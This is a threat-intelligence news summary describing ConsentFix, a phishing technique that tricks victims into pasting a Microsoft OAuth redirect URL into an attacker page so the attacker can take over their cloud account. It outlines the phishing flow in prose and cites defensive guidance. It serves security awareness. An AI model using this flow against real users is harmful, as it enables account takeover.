Security researchers have identified a new phishing technique called ConsentFix that enables attackers to compromise cloud accounts by exploiting legitimate OAuth consent flows. Instead of stealing passwords or MFA codes, the attack relies on social engineering to trick users into copying and pasting a valid Microsoft sign-in URL, which contains an OAuth authorization code, back into a phishing page. This allows threat actors to capture OAuth authorization codes and access tokens, granting them full access to the victim's cloud account without credential exposure. The attack specifically targets users by requiring a matching email address and leverages trusted authentication infrastructure, making detection more challenging for organizations relying on cloud services.
The ConsentFix method is similar to the previously documented ClickFix technique, which used fake CAPTCHA pages, but it innovates by harvesting tokens directly through the OAuth process. The phishing flow involves a Cloudflare-style verification prompt, targeted email validation, and redirection to a legitimate Microsoft login page. After successful authentication, the victim is instructed to paste a localhost URL containing the authorization code into the phishing site, enabling the attacker to hijack the session. This technique poses a significant risk to organizations using cloud platforms, as it bypasses traditional credential theft defenses and exploits the inherent trust in OAuth authentication flows.

Mallory correlates global threat intelligence with your attack surface — know if you’re exposed before adversaries strike.
2 events from the most recent confirmed update back to the earliest known activity.
Arctic Wolf published analysis describing how ConsentFix harvests OAuth authorization codes and exchanges them for access tokens, enabling account takeover through trusted identity infrastructure. The guidance recommended never pasting authentication URLs into untrusted sites, improving endpoint and network visibility, and reinforcing security awareness training.
Push Security reported a newly observed browser-based phishing technique named ConsentFix, which abuses legitimate OAuth authentication and consent flows to compromise cloud accounts without stealing passwords or MFA codes. The technique tricks victims into copying and pasting a valid Microsoft sign-in URL containing an OAuth authorization code into an attacker-controlled page.
Vulnerabilities, threat actors, malware, products, organizations, and breaches Mallory has linked to this story.
2 references tracked. Mallory keeps watching after this page renders.
Map indicators from this story to your assets and identify affected systems in minutes.
Every observed campaign, victim, and pivot linked to actors named in this story.
Malware, exploits, and IOCs connected to the activity described here.
YARA, Sigma, and Snort rules deployed to your SIEM as soon as they’re published.
Get matching new stories delivered to your team as they break — not the next morning.
Ask questions about this story and take action on the answers.